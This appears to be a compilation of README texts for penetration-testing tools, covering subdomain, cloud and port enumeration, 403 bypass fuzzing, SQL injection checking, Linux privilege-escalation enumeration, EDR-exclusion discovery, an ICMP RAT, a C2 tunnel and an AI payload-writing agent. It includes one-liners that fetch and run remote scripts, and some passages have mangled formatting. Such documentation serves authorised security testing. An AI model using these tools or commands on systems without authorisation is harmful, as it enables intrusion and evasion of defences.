secator
is a task and workflow runner used for security assessments. It supports dozens of well-known security tools and it is designed to improve productivity for pentesters and security researchers.
Curated list of commands
Unified input options
Unified output schema
CLI and library usage
Distributed options with Celery
Complexity from simple tasks to complex workflows
secator
integrates the following tools:
Name | Description | Category |
---|---|---|
httpx | Fast HTTP prober. | http |
cariddi | Fast crawler and endpoint secrets / api keys / tokens matcher. | http/crawler |
gau | Offline URL crawler (Alien Vault, The Wayback Machine, Common Crawl, URLScan). | http/crawler |
gospider | Fast web spider written in Go. | http/crawler |
katana | Next-generation crawling and spidering framework. | http/crawler |
dirsearch | Web path discovery. | http/fuzzer |
feroxbuster | Simple, fast, recursive content discovery tool written in Rust. | http/fuzzer |
ffuf | Fast web fuzzer written in Go. | http/fuzzer |
h8mail | Email OSINT and breach hunting tool. | osint |
dnsx | Fast and multi-purpose DNS toolkit designed for running DNS queries. | recon/dns |
dnsxbrute | Fast and multi-purpose DNS toolkit designed for running DNS queries (bruteforce mode). | recon/dns |
subfinder | Fast subdomain finder. | recon/dns |
fping | Find alive hosts on local networks. | recon/ip |
mapcidr | Expand CIDR ranges into IPs. | recon/ip |
naabu | Fast port discovery tool. | recon/port |
maigret | Hunt for user accounts across many websites. | recon/user |
gf | A wrapper around grep to avoid typing common patterns. | tagger |
grype | A vulnerability scanner for container images and filesystems. | vuln/code |
dalfox | Powerful XSS scanning tool and parameter analyzer. | vuln/http |
msfconsole | CLI to access and work with the Metasploit Framework. | vuln/http |
wpscan | WordPress Security Scanner | vuln/multi |
nmap | Vulnerability scanner using NSE scripts. | vuln/multi |
nuclei | Fast and customisable vulnerability scanner based on simple YAML based DSL. | vuln/multi |
searchsploit | Exploit searcher. | exploit/search |
Feel free to request new tools to be added by opening an issue, but please check that the tool complies with our selection criterias before doing so. If it doesn't but you still want to integrate it into secator
, you can plug it in (see the dev guide).
pipx install secator
pip install secator
wget -O - https://raw.githubusercontent.com/freelabz/secator/main/scripts/install.sh | sh
docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator --help
The volume mount -v is necessary to save all secator reports to your host machine, and--net=host is recommended to grant full access to the host network. You can alias this command to run it easier: alias secator="docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator"
Now you can run secator like if it was installed on baremetal: secator --help
git clone https://github.com/freelabz/secator
cd secator
docker-compose up -d
docker-compose exec secator secator --help
Note: If you chose the Bash, Docker or Docker Compose installation methods, you can skip the next sections and go straight to Usage.
secator
uses external tools, so you might need to install languages used by those tools assuming they are not already installed on your system.
We provide utilities to install required languages if you don't manage them externally:
secator install langs go
secator install langs ruby
secator
does not install any of the external tools it supports by default.
We provide utilities to install or update each supported tool which should work on all systems supporting apt
:
secator install tools
secator install tools <TOOL_NAME>
For instance, to install `httpx`, use: secator install tools httpx
Please make sure you are using the latest available versions for each tool before you run secator or you might run into parsing / formatting issues.
secator
comes installed with the minimum amount of dependencies.
There are several addons available for secator
:
secator install addons worker
secator install addons google
secator install addons mongodb
secator install addons redis
secator install addons dev
secator install addons trace
secator install addons build
secator
makes remote API calls to https://cve.circl.lu/ to get in-depth information about the CVEs it encounters. We provide a subcommand to download all known CVEs locally so that future lookups are made from disk instead:
secator install cves
To figure out which languages or tools are installed on your system (along with their version):
secator health
secator --help
Run a fuzzing task (ffuf
):
secator x ffuf http://testphp.vulnweb.com/FUZZ
Run a url crawl workflow:
secator w url_crawl http://testphp.vulnweb.com
Run a host scan:
secator s host mydomain.com
and more... to list all tasks / workflows / scans that you can use:
secator x --help
secator w --help
secator s --help
To go deeper with secator
, check out: * Our complete documentation * Our getting started tutorial video * Our Medium post * Follow us on social media: @freelabz on Twitter and @FreeLabz on YouTube
A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode). The outcome is useful for bug bounty hunters, red teamers, and penetration testers alike.
The complete writeup is available. here
we are always thinking of something we can automate to make black-box security testing easier. We discussed this idea of creating a multiple platform cloud brute-force hunter.mainly to find open buckets, apps, and databases hosted on the clouds and possibly app behind proxy servers.
Here is the list issues on previous approaches we tried to fix:
Microsoft: - Storage - Apps
Amazon: - Storage - Apps
Google: - Storage - Apps
DigitalOcean: - storage
Vultr: - Storage
Linode: - Storage
Alibaba: - Storage
1.0.0
Just download the latest release for your operation system and follow the usage.
To make the best use of this tool, you have to understand how to configure it correctly. When you open your downloaded version, there is a config folder, and there is a config.YAML file in there.
It looks like this
providers: ["amazon","alibaba","amazon","microsoft","digitalocean","linode","vultr","google"] # supported providers
environments: [ "test", "dev", "prod", "stage" , "staging" , "bak" ] # used for mutations
proxytype: "http" # socks5 / http
ipinfo: "" # IPINFO.io API KEY
For IPINFO API, you can register and get a free key at IPINFO, the environments used to generate URLs, such as test-keyword.target.region and test.keyword.target.region, etc.
We provided some wordlist out of the box, but it's better to customize and minimize your wordlists (based on your recon) before executing the tool.
After setting up your API key, you are ready to use CloudBrute.
ββββββββββ βββββββ βββ ββββββββββ βββββββ βββββββ βββ ββββββββββββββββββββ
βββββββββββ ββββββββββββ ββββββββββββββββββββββββββββββ ββββββββββββββββββββ
βββ βββ βββ ββββββ ββββββ ββββββββββββββββββββββ βββ βββ ββββββ
βββ βββ βββ ββββββ ββββββ ββββββββββββββββββββββ βββ βββ ββββββ
βββββββββββββββββββββββββββββββββββββββββββββββββββββ ββββββββββββ βββ ββββββββ
βββββββββββββββ βββββββ βββββββ βββββββ βββββββ βββ βββ βββββββ βββ ββββββββ
V 1.0.7
usage: CloudBrute [-h|--help] -d|--domain "<value>" -k|--keyword "<value>"
-w|--wordlist "<value>" [-c|--cloud "<value>"] [-t|--threads
<integer>] [-T|--timeout <integer>] [-p|--proxy "<value>"]
[-a|--randomagent "<value>"] [-D|--debug] [-q|--quite]
[-m|--mode "<value>"] [-o|--output "<value>"]
[-C|--configFolder "<value>"]
Awesome Cloud Enumerator
Arguments:
-h --help Print help information
-d --domain domain
-k --keyword keyword used to generator urls
-w --wordlist path to wordlist
-c --cloud force a search, check config.yaml providers list
-t --threads number of threads. Default: 80
-T --timeout timeout per request in seconds. Default: 10
-p --proxy use proxy list
-a --randomagent user agent randomization
-D --debug show debug logs. Default: false
-q --quite suppress all output. Default: false
-m --mode storage or app. Default: storage
-o --output Output file. Default: out.txt
-C --configFolder Config path. Default: config
for example
CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"
please note -k keyword used to generate URLs, so if you want the full domain to be part of mutation, you have used it for both domain (-d) and keyword (-k) arguments
If a cloud provider not detected or want force searching on a specific provider, you can use -c option.
CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt
Read the usage.
Make sure you read the usage correctly, and if you think you found a bug open an issue.
It's because you use public proxies, use private and higher quality proxies. You can use ProxyFor to verify the good proxies with your chosen provider.
change -T (timeout) option to get best results for your run.
Inspired by every single repo listed here .
Domainim is a fast domain reconnaissance tool for organizational network scanning. The tool aims to provide a brief overview of an organization's structure using techniques like OSINT, bruteforcing, DNS resolving etc.
Current features (v1.0.1)- - Subdomain enumeration (2 engines + bruteforcing) - User-friendly output - Resolving A records (IPv4)
A few features are work in progress. See Planned features for more details.
The project is inspired by Sublist3r. The port scanner module is heavily based on NimScan.
You can build this repo from source- - Clone the repository
git clone git@github.com:pptx704/domainim
nimble build
./domainim <domain> [--ports=<ports>]
Or, you can just download the binary from the release page. Keep in mind that the binary is tested on Debian based systems only.
./domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
<domain>
is the domain to be enumerated. It can be a subdomain as well.-- ports | -p
is a string speicification of the ports to be scanned. It can be one of the following-all
- Scan all ports (1-65535)none
- Skip port scanning (default)t<n>
- Scan top n ports (same as nmap
). i.e. t100
scans top 100 ports. Max value is 5000. If n is greater than 5000, it will be set to 5000.80
scans port 8080-100
scans ports 80 to 10080,443,8080
scans ports 80, 443 and 808080,443,8080-8090,t500
scans ports 80, 443, 8080 to 8090 and top 500 ports--dns | -d
is the address of the dns server. This should be a valid IPv4 address and can optionally contain the port number-a.b.c.d
- Use DNS server at a.b.c.d
on port 53a.b.c.d#n
- Use DNS server at a.b.c.d
on port e
--wordlist | -l
- Path to the wordlist file. This is used for bruteforcing subdomains. If the file is invalid, bruteforcing will be skipped. You can get a wordlist from SecLists. A wordlist is also provided in the release page.--rps | -r
- Number of requests to be made per second during bruteforce. The default value is 1024 req/s
. It is to be noted that, DNS queries are made in batches and next batch is made only after the previous one is completed. Since quries can be rate limited, increasing the value does not always guarantee faster results.--out | -o
- Path to the output file. The output will be saved in JSON format. The filename must end with .json
.Examples - ./domainim nmap.org --ports=all
- ./domainim google.com --ports=none --dns=8.8.8.8#53
- ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --rps=1500
- ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --outfile=results.json
- ./domainim mysite.com --ports=t50,5432,7000-9000 --dns=1.1.1.1
The help menu can be accessed using ./domainim --help
or ./domainim -h
.
Usage:
domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
domainim (-h | --help)
Options:
-h, --help Show this screen.
-p, --ports Ports to scan. [default: `none`]
Can be `all`, `none`, `t<n>`, single value, range value, combination
-l, --wordlist Wordlist for subdomain bruteforcing. Bruteforcing is skipped for invalid file.
-d, --dns IP and Port for DNS Resolver. Should be a valid IPv4 with an optional port [default: system default]
-r, --rps DNS queries to be made per second [default: 1024 req/s]
-o, --out JSON file where the output will be saved. Filename must end with `.json`
Examples:
domainim domainim.com -p:t500 -l:wordlist.txt --dns:1.1.1.1#53 --out=results.json
domainim sub.domainim.com --ports=all --dns:8.8.8.8 -t:1500 -o:results.json
The JSON schema for the results is as follows-
[
{
"subdomain": string,
"data": [
"ipv4": string,
"vhosts": [string],
"reverse_dns": string,
"ports": [int]
]
}
]
Example json for nmap.org
can be found here.
Contributions are welcome. Feel free to open a pull request or an issue.
This project is still in its early stages. There are several limitations I am aware of.
The two engines I am using (I'm calling them engine because Sublist3r does so) currently have some sort of response limit. dnsdumpster.com">dnsdumpster can fetch upto 100 subdomains. crt.sh also randomizes the results in case of too many results. Another issue with crt.sh is the fact that it returns some SQL error sometimes. So for some domain, results can be different for different runs. I am planning to add more engines in the future (at least a brute force engine).
The port scanner has only ping response time + 750ms
timeout. This might lead to false negatives. Since, domainim is not meant for port scanning but to provide a quick overview, such cases are acceptable. However, I am planning to add a flag to increase the timeout. For the same reason, filtered ports are not shown. For more comprehensive port scanning, I recommend using Nmap. Domainim also doesn't bypass rate limiting (if there is any).
It might seem that the way vhostnames are printed, it just brings repeition on the table.
Printing as the following might've been better-
ack.nmap.org, issues.nmap.org, nmap.org, research.nmap.org, scannme.nmap.org, svn.nmap.org, www.nmap.org
β³ 45.33.49.119
β³ Reverse DNS: ack.nmap.org.
But previously while testing, I found cases where not all IPs are shared by same set of vhostnames. That is why I decided to keep it this way.
DNS server might have some sort of rate limiting. That's why I added random delays (between 0-300ms) for IPv4 resolving per query. This is to not make the DNS server get all the queries at once but rather in a more natural way. For bruteforcing method, the value is between 0-1000ms by default but that can be changed using --rps | -t
flag.
One particular limitation that is bugging me is that the DNS resolver would not return all the IPs for a domain. So it is necessary to make multiple queries to get all (or most) of the IPs. But then again, it is not possible to know how many IPs are there for a domain. I still have to come up with a solution for this. Also, nim-ndns
doesn't support CNAME records. So, if a domain has a CNAME record, it will not be resolved. I am waiting for a response from the author for this.
For now, bruteforcing is skipped if a possible wildcard subdomain is found. This is because, if a domain has a wildcard subdomain, bruteforcing will resolve IPv4 for all possible subdomains. However, this will skip valid subdomains also (i.e. scanme.nmap.org
will be skipped even though it's not a wildcard value). I will add a --force-brute | -fb
flag later to force bruteforcing.
Similar thing is true for VHost enumeration for subdomain inputs. Since, urls that ends with given subdomains are returned, subdomains of similar domains are not considered. For example, scannme.nmap.org
will not be printed for ack.nmap.org
but something.ack.nmap.org
might be. I can search for all subdomains of nmap.org
but that defeats the purpose of having a subdomains as an input.
MIT License. See LICENSE for full text.
First, a couple of useful oneliners ;)
wget "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -O lse.sh;chmod 700 lse.sh
curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh
Note that since version 2.10
you can serve the script to other hosts with the -S
flag!
Linux enumeration tools for pentesting and CTFs
This project was inspired by https://github.com/rebootuser/LinEnum and uses many of its tests.
Unlike LinEnum, lse
tries to gradualy expose the information depending on its importance from a privesc point of view.
This shell script will show relevant information about the security of the local Linux system, helping to escalate privileges.
From version 2.0 it is mostly POSIX compliant and tested with shellcheck
and posh
.
It can also monitor processes to discover recurrent program executions. It monitors while it is executing all the other tests so you save some time. By default it monitors during 1 minute but you can choose the watch time with the -p
parameter.
It has 3 levels of verbosity so you can control how much information you see.
In the default level you should see the highly important security flaws in the system. The level 1
(./lse.sh -l1
) shows interesting information that should help you to privesc. The level 2
(./lse.sh -l2
) will just dump all the information it gathers about the system.
By default it will ask you some questions: mainly the current user password (if you know it ;) so it can do some additional tests.
The idea is to get the information gradually.
First you should execute it just like ./lse.sh
. If you see some green yes!
, you probably have already some good stuff to work with.
If not, you should try the level 1
verbosity with ./lse.sh -l1
and you will see some more information that can be interesting.
If that does not help, level 2
will just dump everything you can gather about the service using ./lse.sh -l2
. In this case you might find useful to use ./lse.sh -l2 | less -r
.
You can also select what tests to execute by passing the -s
parameter. With it you can select specific tests or sections to be executed. For example ./lse.sh -l2 -s usr010,net,pro
will execute the test usr010
and all the tests in the sections net
and pro
.
Use: ./lse.sh [options]
OPTIONS
-c Disable color
-i Non interactive mode
-h This help
-l LEVEL Output verbosity level
0: Show highly important results. (default)
1: Show interesting results.
2: Show all gathered information.
-s SELECTION Comma separated list of sections or tests to run. Available
sections:
usr: User related tests.
sud: Sudo related tests.
fst: File system related tests.
sys: System related tests.
sec: Security measures related tests.
ret: Recurren tasks (cron, timers) related tests.
net: Network related tests.
srv: Services related tests.
pro: Processes related tests.
sof: Software related tests.
ctn: Container (docker, lxc) related tests.
cve: CVE related tests.
Specific tests can be used with their IDs (i.e.: usr020,sud)
-e PATHS Comma separated list of paths to exclude. This allows you
to do faster scans at the cost of completeness
-p SECONDS Time that the process monitor will spend watching for
processes. A value of 0 will disable any watch (default: 60)
-S Serve the lse.sh script in this host so it can be retrieved
from a remote host.
Also available in webm video
Direct execution oneliners
bash <(wget -q -O - "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l2 -i
bash <(curl -s "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l1 -i
Subdomain takeover is a common vulnerability that allows an attacker to gain control over a subdomain of a target domain and redirect users intended for an organization's domain to a website that performs malicious activities, such as phishing campaigns, stealing user cookies, etc. It occurs when an attacker gains control over a subdomain of a target domain. Typically, this happens when the subdomain has a CNAME in the DNS, but no host is providing content for it. Subhunter takes a given list of Subdomains" title="Subdomains">subdomains and scans them to check this vulnerability.
Download from releases
Build from source:
$ git clone https://github.com/Nemesis0U/Subhunter.git
$ go build subhunter.go
Usage of subhunter:
-l string
File including a list of hosts to scan
-o string
File to save results
-t int
Number of threads for scanning (default 50)
-timeout int
Timeout in seconds (default 20)
./Subhunter -l subdomains.txt -o test.txt
____ _ _ _
/ ___| _ _ | |__ | |__ _ _ _ __ | |_ ___ _ __
\___ \ | | | | | '_ \ | '_ \ | | | | | '_ \ | __| / _ \ | '__|
___) | | |_| | | |_) | | | | | | |_| | | | | | | |_ | __/ | |
|____/ \__,_| |_.__/ |_| |_| \__,_| |_| |_| \__| \___| |_|
A fast subdomain takeover tool
Created by Nemesis
Loaded 88 fingerprints for current scan
-----------------------------------------------------------------------------
[+] Nothing found at www.ubereats.com: Not Vulnerable
[+] Nothing found at testauth.ubereats.com: Not Vulnerable
[+] Nothing found at apple-maps-app-clip.ubereats.com: Not Vulnerable
[+] Nothing found at about.ubereats.com: Not Vulnerable
[+] Nothing found at beta.ubereats.com: Not Vulnerable
[+] Nothing found at ewp.ubereats.com: Not Vulnerable
[+] Nothi ng found at edgetest.ubereats.com: Not Vulnerable
[+] Nothing found at guest.ubereats.com: Not Vulnerable
[+] Google Cloud: Possible takeover found at testauth.ubereats.com: Vulnerable
[+] Nothing found at info.ubereats.com: Not Vulnerable
[+] Nothing found at learn.ubereats.com: Not Vulnerable
[+] Nothing found at merchants.ubereats.com: Not Vulnerable
[+] Nothing found at guest-beta.ubereats.com: Not Vulnerable
[+] Nothing found at merchant-help.ubereats.com: Not Vulnerable
[+] Nothing found at merchants-beta.ubereats.com: Not Vulnerable
[+] Nothing found at merchants-staging.ubereats.com: Not Vulnerable
[+] Nothing found at messages.ubereats.com: Not Vulnerable
[+] Nothing found at order.ubereats.com: Not Vulnerable
[+] Nothing found at restaurants.ubereats.com: Not Vulnerable
[+] Nothing found at payments.ubereats.com: Not Vulnerable
[+] Nothing found at static.ubereats.com: Not Vulnerable
Subhunter exiting...
Results written to test.txt
The original 403fuzzer.py :)
Fuzz 401/403ing endpoints for bypasses
This tool performs various checks via headers, path normalization, verbs, etc. to attempt to bypass ACL's or URL validation.
It will output the response codes and length for each request, in a nicely organized, color coded way so things are reaable.
I implemented a "Smart Filter" that lets you mute responses that look the same after a certain number of times.
You can now feed it raw HTTP requests that you save to a file from Burp.
usage: bypassfuzzer.py -h
Simply paste the request into a file and run the script!
- It will parse and use cookies
& headers
from the request. - Easiest way to authenticate for your requests
python3 bypassfuzzer.py -r request.txt
Specify a URL
python3 bypassfuzzer.py -u http://example.com/test1/test2/test3/forbidden.html
Specify cookies to use in requests:
some examples:
--cookies "cookie1=blah"
-c "cookie1=blah; cookie2=blah"
Specify a method/verb and body data to send
bypassfuzzer.py -u https://example.com/forbidden -m POST -d "param1=blah¶m2=blah2"
bypassfuzzer.py -u https://example.com/forbidden -m PUT -d "param1=blah¶m2=blah2"
Specify custom headers to use with every request Maybe you need to add some kind of auth header like Authorization: bearer <token>
Specify -H "header: value"
for each additional header you'd like to add:
bypassfuzzer.py -u https://example.com/forbidden -H "Some-Header: blah" -H "Authorization: Bearer 1234567"
Based on response code and length. If it sees a response 8 times or more it will automatically mute it.
Repeats are changeable in the code until I add an option to specify it in flag
NOTE: Can't be used simultaneously with -hc
or -hl
(yet)
# toggle smart filter on
bypassfuzzer.py -u https://example.com/forbidden --smart
Useful if you wanna proxy through Burp
bypassfuzzer.py -u https://example.com/forbidden --proxy http://127.0.0.1:8080
# skip sending headers payloads
bypassfuzzer.py -u https://example.com/forbidden -sh
bypassfuzzer.py -u https://example.com/forbidden --skip-headers
# Skip sending path normailization payloads
bypassfuzzer.py -u https://example.com/forbidden -su
bypassfuzzer.py -u https://example.com/forbidden --skip-urls
Provide comma delimited lists without spaces. Examples:
# Hide response codes
bypassfuzzer.py -u https://example.com/forbidden -hc 403,404,400
# Hide response lengths of 638
bypassfuzzer.py -u https://example.com/forbidden -hl 638
Download the binaries
or build the binaries and you are ready to go:
$ git clone https://github.com/Nemesis0U/PingRAT.git
$ go build client.go
$ go build server.go
./server -h
Usage of ./server:
-d string
Destination IP address
-i string
Listener (virtual) Network Interface (e.g. eth0)
./client -h
Usage of ./client:
-d string
Destination IP address
-i string
(Virtual) Network Interface (e.g., eth0)
SQLMC (SQL Injection Massive Checker) is a tool designed to scan a domain for SQL injection vulnerabilities. It crawls the given URL up to a specified depth, checks each link for SQL injection vulnerabilities, and reports its findings.
bash pip3 install sqlmc
Run sqlmc
with the following command-line arguments:
-u, --url
: The URL to scan (required)-d, --depth
: The depth to scan (required)-o, --output
: The output file to save the resultsExample usage:
sqlmc -u http://example.com -d 2
Replace http://example.com with the URL you want to scan and 3 with the desired depth of the scan. You can also specify an output file using the -o or --output flag followed by the desired filename.
The tool will then perform the scan and display the results.
This project is licensed under the GNU Affero General Public License v3.0.
BadExclusionsNWBO is an evolution from BadExclusions to identify folder custom or undocumented exclusions on AV/EDR.
BadExclusionsNWBO copies and runs Hook_Checker.exe in all folders and subfolders of a given path. You need to have Hook_Checker.exe on the same folder of BadExclusionsNWBO.exe.
Hook_Checker.exe returns the number of EDR hooks. If the number of hooks is 7 or less means folder has an exclusion otherwise the folder is not excluded.
Since the release of BadExclusions I've been thinking on how to achieve the same results without creating that many noise. The solution came from another tool, https://github.com/asaurusrex/Probatorum-EDR-Userland-Hook-Checker.
If you download Probatorum-EDR-Userland-Hook-Checker and you run it inside a regular folder and on folder with an specific type of exclusion you will notice a huge difference. All the information is on the Probatorum repository.
Each vendor apply exclusions on a different way. In order to get the list of folder exclusions an specific type of exclusion should be made. Not all types of exclusion and not all the vendors remove the hooks when they exclude a folder.
The user who runs BadExclusionsNWBO needs write permissions on the excluded folder in order to write Hook_Checker file and get the results.
https://github.com/iamagarre/BadExclusionsNWBO/assets/89855208/46982975-f4a5-4894-b78d-8d6ed9b1c8c4
Multi-cloud OSINT tool. Enumerate public resources in AWS, Azure, and Google Cloud.
Currently enumerates the following:
Amazon Web Services: - Open / Protected S3 Buckets - awsapps (WorkMail, WorkDocs, Connect, etc.)
Microsoft Azure: - Storage Accounts - Open Blob Storage Containers - Hosted Databases - Virtual Machines - Web Apps
Google Cloud Platform - Open / Protected GCP Buckets - Open / Protected Firebase Realtime Databases - Google App Engine sites - Cloud Functions (enumerates project/regions with existing functions, then brute forces actual function names) - Open Firebase Apps
See it in action in Codingo's video demo here.
Several non-standard libaries are required to support threaded HTTP requests and dns lookups. You'll need to install the requirements as follows:
pip3 install -r ./requirements.txt
The only required argument is at least one keyword. You can use the built-in fuzzing strings, but you will get better results if you supply your own with -m
and/or -b
.
You can provide multiple keywords by specifying the -k
argument multiple times.
Keywords are mutated automatically using strings from enum_tools/fuzz.txt
or a file you provide with the -m
flag. Services that require a second-level of brute forcing (Azure Containers and GCP Functions) will also use fuzz.txt
by default or a file you provide with the -b
flag.
Let's say you were researching "somecompany" whose website is "somecompany.io" that makes a product called "blockchaindoohickey". You could run the tool like this:
./cloud_enum.py -k somecompany -k somecompany.io -k blockchaindoohickey
HTTP scraping and DNS lookups use 5 threads each by default. You can try increasing this, but eventually the cloud providers will rate limit you. Here is an example to increase to 10.
./cloud_enum.py -k keyword -t 10
IMPORTANT: Some resources (Azure Containers, GCP Functions) are discovered per-region. To save time scanning, there is a "REGIONS" variable defined in cloudenum/azure_regions.py and cloudenum/gcp_regions.py
that is set by default to use only 1 region. You may want to look at these files and edit them to be relevant to your own work.
Complete Usage Details
usage: cloud_enum.py [-h] -k KEYWORD [-m MUTATIONS] [-b BRUTE]
Multi-cloud enumeration utility. All hail OSINT!
optional arguments:
-h, --help show this help message and exit
-k KEYWORD, --keyword KEYWORD
Keyword. Can use argument multiple times.
-kf KEYFILE, --keyfile KEYFILE
Input file with a single keyword per line.
-m MUTATIONS, --mutations MUTATIONS
Mutations. Default: enum_tools/fuzz.txt
-b BRUTE, --brute BRUTE
List to brute-force Azure container names. Default: enum_tools/fuzz.txt
-t THREADS, --threads THREADS
Threads for HTTP brute-force. Default = 5
-ns NAMESERVER, --nameserver NAMESERVER
DNS server to use in brute-force.
-l LOGFILE, --logfile LOGFILE
Will APPEND found items to specified file.
-f FORMAT, --format FORMAT
Format for log file (text,json,csv - defaults to text)
--disable-aws Disable Amazon checks.
--disable-azure Disable Azure checks.
--disable-gcp Disable Google checks.
-qs, --quickscan Disable all mutations and second-level scans
So far, I have borrowed from: - Some of the permutations from GCPBucketBrute
Pentest Muse is an AI assistant tailored for cybersecurity professionals. It can help penetration testers brainstorm ideas, write payloads, analyze code, and perform reconnaissance. It can also take actions, execute command line codes, and iteratively solve complex tasks.
In addition to this command-line tool, we are excited to introduce the Pentest Muse Web Application! The web app has access to the latest online information, and would be a good AI assistant for your pentesting job.
This tool is intended for legal and ethical use only. It should only be used for authorized security testing and educational purposes. The developers assume no liability and are not responsible for any misuse or damage caused by this program.
requirements.txt
git clone https://github.com/pentestmuse-ai/PentestMuse cd PentestMuse
pip install -r requirements.txt
Install Pentest Muse as a Python Package:
pip install .
In the chat mode, you can chat with pentest muse and ask it to help you brainstorm ideas, write payloads, and analyze code. Run the application with:
python run_app.py
or
pmuse
You can also give Pentest Muse more control by asking it to take actions for you with the agent mode. In this mode, Pentest Muse can help you finish a simple task (e.g., 'help me do sql injection test on url xxx'). To start the program with agent model, you can use:
python run_app.py agent
or
pmuse agent
You can use Pentest Muse with our managed APIs after signing up at www.pentestmuse.ai/signup. After creating an account, you can simply start the pentest muse cli, and the program will prompt you to login.
Alternatively, you can also choose to use your own OpenAI API keys. To do this, you can simply add argument --openai-api-key=[your openai api key]
when starting the program.
For any feedback or suggestions regarding Pentest Muse, feel free to reach out to us at contact@pentestmuse.ai or join our discord. Your input is invaluable in helping us improve and evolve.
The summary of the changelog since the 2023.4 release from December is:
secbutler
is a utility tool made for pentesters, bug-bounty hunters and security researchers that contains all the most used and tedious stuff commonly used while performing cybersecurity activities (like installing sec-related tools, retrieving commands for revshells, serving common payloads, obtaining a working proxy, managing wordlists and so forth).
The goal is to obtain a tool that meets the requirements of the community, therefore suggestions and PRs are very welcome!
secbutler -h
This will display the help for the tool
__ __ __
________ _____/ /_ __ __/ /_/ /__ _____
/ ___/ _ \/ ___/ __ \/ / / / __/ / _ \/ ___/
(__ ) __/ /__/ /_/ / /_/ / /_/ / __/ /
/____/\___/\___/_.___/\__,_/\__/_/\___/_/
v0.1.9 - https://github.com/groundsec/secbutler
Essential utilities for pentester, bug-bounty hunters and security researchers
Usage:
secbutler [flags]
secbutler [command]
Available Commands:
cheatsheet Read common cheatsheets & payloads
help Help about any command
listener Obtain the command to start a reverse shell listener
payloads Obtain and serve common payloads
proxy Obtain a random proxy from FreeProxy
revshell Obtain the command for a reverse shell
tools Generate a install script for the most common cybersecurity tools
version Print the current version
wordlists Generate a download script for the most common wordlists
Flags:
-h, --help help for secbutler
Use "secbutler [command] --help" for more information about a command.
Run the following command to install the latest version:
go install github.com/groundsec/secbutler@latest
Or you can simply grab an executable from the Releases page.
secbutler is made with π€ by the GroundSec team and released under the MIT LICENSE.
With the rapidly increasing variety of attack techniques and a simultaneous rise in the number of detection rules offered by EDRs (Endpoint Detection and Response) and custom-created ones, the need for constant functional testing of detection rules has become evident. However, manually re-running these attacks and cross-referencing them with detection rules is a labor-intensive task which is worth automating.
To address this challenge, I developed "PurpleKeep," an open-source initiative designed to facilitate the automated testing of detection rules. Leveraging the capabilities of the Atomic Red Team project which allows to simulate attacks following MITRE TTPs (Tactics, Techniques, and Procedures). PurpleKeep enhances the simulation of these TTPs to serve as a starting point for the evaluation of the effectiveness of detection rules.
Automating the process of simulating one or multiple TTPs in a test environment comes with certain challenges, one of which is the contamination of the platform after multiple simulations. However, PurpleKeep aims to overcome this hurdle by streamlining the simulation process and facilitating the creation and instrumentation of the targeted platform.
Primarily developed as a proof of concept, PurpleKeep serves as an End-to-End Detection Rule Validation platform tailored for an Azure-based environment. It has been tested in combination with the automatic deployment of Microsoft Defender for Endpoint as the preferred EDR solution. PurpleKeep also provides support for security and audit policy configurations, allowing users to mimic the desired endpoint environment.
To facilitate analysis and monitoring, PurpleKeep integrates with Azure Monitor and Log Analytics services to store the simulation logs and allow further correlation with any events and/or alerts stored in the same platform.
TLDR: PurpleKeep provides an Attack Simulation platform to serve as a starting point for your End-to-End Detection Rule Validation in an Azure-based environment.
The project is based on Azure Pipelines and requires the following to be able to run:
You can provide a security and/or audit policy file that will be loaded to mimic your Group Policy configurations. Use the Secure File option of the Library in Azure DevOps to make it accessible to your pipelines.
Refer to the variables file for your configurable items.
Deploying the infrastructure uses the Azure Pipeline to perform the following steps:
Currently only the Atomics from the public repository are supported. The pipelines takes a Technique ID as input or a comma seperate list of techniques, for example:
The logs of the simulation are ingested into the AtomicLogs_CL table of the Log Analytics Workspace.
There are currently two ways to run the simulation:
This pipeline will deploy a fresh platform after the simulation of each TTP. The Log Analytic workspace will maintain the logs of each run.
Warning: this will onboard a large number of hosts into your EDR
A fresh infrastructure will be deployed only at the beginning of the pipeline. All TTP's will be simulated on this instance. This is the fastests way to simulate and prevents onboarding a large number of devices, however running a lot of simulations in a same environment has the risk of contaminating the environment and making the simulations less stable and predictable.
Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).
Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor.
When running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.
As an example, for a TCP connection:
This allows running tools like nmap without the use of proxychains (simpler and faster).
Precompiled binaries (Windows/Linux/macOS) are available on the Release page.
Building ligolo-ng (Go >= 1.20 is required):
$ go build -o agent cmd/agent/main.go
$ go build -o proxy cmd/proxy/main.go
# Build for Windows
$ GOOS=windows go build -o agent.exe cmd/agent/main.go
$ GOOS=windows go build -o proxy.exe cmd/proxy/main.go
When using Linux, you need to create a tun interface on the Proxy Server (C2):
$ sudo ip tuntap add user [your_username] mode tun ligolo
$ sudo ip link set ligolo up
You need to download the Wintun driver (used by WireGuard) and place the wintun.dll
in the same folder as Ligolo (make sure you use the right architecture).
Start the proxy server on your Command and Control (C2) server (default port 11601):
$ ./proxy -h # Help options
$ ./proxy -autocert # Automatically request LetsEncrypt certificates
When using the -autocert
option, the proxy will automatically request a certificate (using Let's Encrypt) for attacker_c2_server.com when an agent connects.
Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval
